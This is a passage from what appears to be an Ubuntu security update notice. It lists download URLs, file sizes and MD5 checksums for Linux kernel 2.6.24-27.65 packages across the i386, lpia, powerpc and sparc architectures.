  Size/MD5:   137028 068fdde4394c7850abba6ea81e69c801
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   279080 76c07612b0081c38122b1929c7f19f34
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   277690 c635d04d78592fe9792024e84682ccc7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  2012458 d372c1d872861cd7c84ea9d06c4e8162
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  2089276 69416120cd161789b598b2b93034db07
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5:   655314 4adb56a8d5211bba1acc02d76e9fb65d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5:   658154 7d6f7bccbf83f9a32664588ab5faaabe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb
  Size/MD5:  1242098 c22eebab07e9ce3d85526ce2945da263
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb
  Size/MD5:  1262772 85fe04ee16e27b961017cf148c4f1d21
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5:   659870 a3ebd23356d57307d124b62faf3fc2a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5:   561726 410d756762ce992d36864ce38efc2e1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb
  Size/MD5:  1059932 350947cab60fcafb13483ab14ca0ff95
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5: 18380540 1da620cffb3b62617fc8213134b951e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5: 18401264 dd7b7991e7f843ebcae7bc5c8700636d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5: 18513796 c8b5dac38c445a72681bd5dd1c9a1f98
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5:  8730742 fc3305910b00833b509a4e34199e4a67
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5: 25540786 ce01c05207f08195efd8b88b83a93549
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5: 26356028 ed8deb0b2243fd649476c43d245a9690
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5: 27372622 d07e093dc192ad5a49be8c45b5c85dd4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5: 24872642 c28ebc89c9a427352186dea53d81ffe8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb
  Size/MD5:   707576 d26794effd4e857da1db4d28e9407611
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   258852 b86f8c37480cbd19131432c908013dd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   264136 631fc78981097e46ee5643ec3cfc5616
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   163268 1c98e7380c4f80c461a6181344914fea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   163034 9cc84b270528d0fef36320974b415392
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   236710 755a3caeceece8650e46706804c6e072
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   244984 cc330be20f314b308aa0fbcf95c0370c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1810274 169e24dc79c5fbde1ca1a2a5520286d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1827436 cf166d9cdca76a06fd78b1a0669ed67b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   150836 169c287e6bc754d02924a719d34aad29
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   143018 ee925199234ec977618a5c3c3b03954f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   156072 9ff98bc4b62d033785de95858201c353
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   157158 75cdc15de6d5bdc90e05789eb00fe29d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   107222 37ce3c67bd74d5040aa4d22223cbb486
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   108526 7e50df25fcc29d44c2cfdc3e5c046a66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32958 b1b4b1a1b95db3b09923a39eb42c28e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    33388 860c1b56a45914246929757c815f5ec4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    60694 99aca1f49a5cd919f85ef1600ca757ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    61158 bbe05be947e606b614108423a7ca0b83
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    82652 8ffbf8ae116bd81b7632e2e3a58e0a76
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    82954 1532b447c1a1cc43d1cbf46b1e14020f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    48562 d2569ab07923f67de18ed6c63940351c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    48452 dcf73534ccf880da82f6ec8bdad54db7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:     8192 2c3bac93f50147f7f67fffdcbb601b66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:     8444 375a2103e5890c501433ae5b3d912fbb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    51104 8d242482ce8adca7ec8f5d0a40c04c20
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    52950 8449d644f2a2455da01bf48922757fd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    92156 232f32e69ea0f4daf4a17ad68542e45f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    92446 6525df043e2a865a6eb646f015140e31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1443710 2746c7d1f27f2638dd6f141c5d7e68ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1427036 d049929f20e6cbec8c7338977af873a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    43240 53538a90e2ae8dae72a91a8aa79ecb90
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    42806 3b1d48b0e38b9acebe7581278a8e0408
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    11402 83264faacaa7ff9c249144d8dd0061b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    12016 7e17c39f818116eae09203af5f5dd870
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   470484 bede1d05dc08ab51105feaff29b39093
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   472422 d08cc1bf2e88df1908f35afc77fd696a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    70518 751bdd069d86773b5a3cfc67a09b46a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    71382 3aa45fd7cdb245416c60a2210066a353
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb
  Size/MD5: 20248150 fad37a976e62eb5c73f906fd44070b5a
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb
  Size/MD5: 18543176 2f3a767f3505c51ebac878d921d3f3d8
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb
  Size/MD5: 18782962 8a5a3287d174aa7fd1cceb71be94f347

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb
  Size/MD5:   639434 d3cfd21a90ea311f0b1efa2ac28dfac0
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb
  Size/MD5:   705462 81a381fb023a0e0074d8cfaa7fca88b8
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb
  Size/MD5:   707532 c6bf8f82d8bbc4e2320343f58629a562
http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb
  Size/MD5: 14516344 29b153dcb44d72c1e5862191cb266c6b
http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb
  Size/MD5: 19816106 947ff90add29d1fc18a69145f39341d1

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   334046 06512921aae848be603af54dc56f72e6
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   318530 4e8164b49e3ad90d33c9275bd1c7b45d
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    62718 e53308b729496be4a0e343535769c74e
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    73002 10bf1560cb8abc507ea079f6a495f91b
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    41442 a9d6733876fcf91a271eb189eaffcb37
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    47826 1d54194b81d12ac7b00b910f625f7a59
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    89506 1d66e8fc56eb6437f783cb677e6c7061
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   105746 034c14e0418581e1b8b56913246e96de
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    44824 5430e2953cc84d26fd0c8e8c4e323a92
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    40932 93dc2a167cf8ab1d80426dd296997295
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   704830 ef370acc49192e464ef553984e361d88
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   770960 ac691fac4ab28cb6d9627fa6b7a5b773
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   243328 b280fefee27294e988529239616e68fe
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   246310 c1d7e140ca2ba026b6a168c6c9748476
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    69160 665a09e07612701e5c6bc7efee856e5c
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   132586 f0e732beade4d5154e887aaa1b1f3625
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    70252 d8f056e2c9d8aabe9acacfbe4e6c9de0
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    77462 d69a84be1856d83b83faf1fa820803f6
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   146272 11a1d0911e3fda9667661975972e08b2
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   165002 c4276844b0ea79946508c0cd3a816541
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   387992 53b23049b6f79a9609349927adec3443
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   350468 694a94354856e10bcc935e2a7ba38a51
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  2431460 3a8171d7d1e7e6b37573c6679812d2ae
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  3473330 1037b52b34e3b26b05f68bfafb48850a
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb
  Size/MD5:   652854 26483fb509f744914f646c49eb7b4d6c
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb
  Size/MD5:   657530 98dd4c49966d886237bed19fddb84057
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb
  Size/MD5:   652742 c9f225771751b175bc9a3d1ccb9b2b91
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb
  Size/MD5: 20175388 98b77e06737b717f07a9f436bf292879
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb
  Size/MD5: 21378902 be6b07df3db6828d5d795954b3ad3c49
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb
  Size/MD5: 19948474 1a42e203300936a0a6bbd91270ac925d
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb
  Size/MD5:   697738 b5f3e2a2bf27249b08f44ca708c75305
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   266748 d71a805e23acc800f21449d312975e04
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   307732 90c6243c8802cdc121bdf92145f7dc17
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   192250 b114447f81aee3dfc51a3c40f2015d66
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   201688 94056840984e621b385099d261ce2420
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   272012 b6790aca1401ed43b8c04befaef9af51
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   306006 50b970f3b69d4eda6d3e59353c9db152
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1807766 ec7ddb35df35bb103f7fa00168c827cd
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  2119612 ee4db3863509964860b0a24a9a6d5951
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   235186 b6a1a89f7279818e17cac5d5b3a8b86e
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   225404 baf5ea09bdbab57626dee3afb306a39b
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   170438 b6bae0ce9350745a5c5ba8d969ae34ef
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   199752 9d4225f0960410c78279f61aa02471da
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   117942 e88c2b968d47d71ef068dcb5abd4d9fd
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   139272 5f4576b20a9dc27976d521d0942ad0c9
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    45372 918120c1bd011bbbb8b95529c0978f09
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    46836 10f5de3e02406e28d373098a6613860b
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    51132 610f6b349ffcb68ca7f58dc7928a7558
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    60292 9b17fdf2d2aa9cbcfd3dbfb1bfc3af41
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    74186 053cc99e1839e95e6e48198a187c3e48
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    87220 b730de88a2ee8d0b1503d2ee30f13e69
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    76092 0a6aab3a33606ec7e97d474de29a47db
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    30230 76c4d08ce66715d75db459c89405a0fb
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:     8486 80580934d5e5f6909c396732bedf2055
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    10030 4e52e0e6b321b919404ffa406ccc2da1
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    57438 24e1b5d61bcbe2b2faf9f31d9b6f7d3b
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    68746 1b541e58e95b8022b84e7d050db97ecc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   101184 97ff0fdbf93ef2526b1a97b962592e37
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   147834 eb62d695f6da016ae938924414bd15ed
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1565722 3bf6b2bd7ef98c403f8cedf220978814
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1514590 307c47dc707e3c96384e6ce043c745be
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    76672 863a1d5aaef2e7d8f5ec43318a2b3f7a
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    85976 b6bedff825f704ceb1269488d698bfbf
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    12702 cc2c9e83433b8f4092748b933292a46b
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    14560 60c8e6f2c5425b8bfea2cbee00dd50c2
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   449632 ff75fd65c13af279e6652e0d09505887
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   504134 364077fbb2c074eb8852249a757b89ae
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    83682 bcafd92384fdae95293c310f83443303
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   108840 2254f5416b8a0cd8d1cd52a57d7a064a

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    59570 0a8a1c6f109f6620c74d81880a6836ef
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    71732 e29b3839ae80a5cc8b8ca1756569e0bb
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    42454 35c72663f93201098e40f0fc36232ccc
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    91776 d7f14f387c9d325ba87761a2da581b5c
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   587190 a4606a71370a3dec9dc6a3aba35ec115
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   171076 2f15afec1e2aa78035659ac46b010cb3
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    22356 aa2c6396604a45f318881df2e562f625
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    46058 5633652b0f71f9e2098ce2798e29269f
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   152976 d7cbf92b5ae85f379d0335c693ccc256
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  2135270 f05d76791e5538fa887f7731d170dc58
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb
  Size/MD5:   565588 5d632e2a56604e4feff30e310f17f024
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb
  Size/MD5:   563928 4b591c5db77c0f5bc41ffff32a14ee31
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb
  Size/MD5: 14098262 0170c4f2c460270add65ba17eb7acfd0
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb
  Size/MD5: 13830862 e4b6c695ad5b3e4ad0b428947b4fd388
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb
  Size/MD5:   752654 6e9b50c2f72a60edf4df6e51d5448cc7
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   270064 879ee6667df636551d565e10ae5162fd
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   190360 388a92b9849a34e99f6a3d2817ca9b05
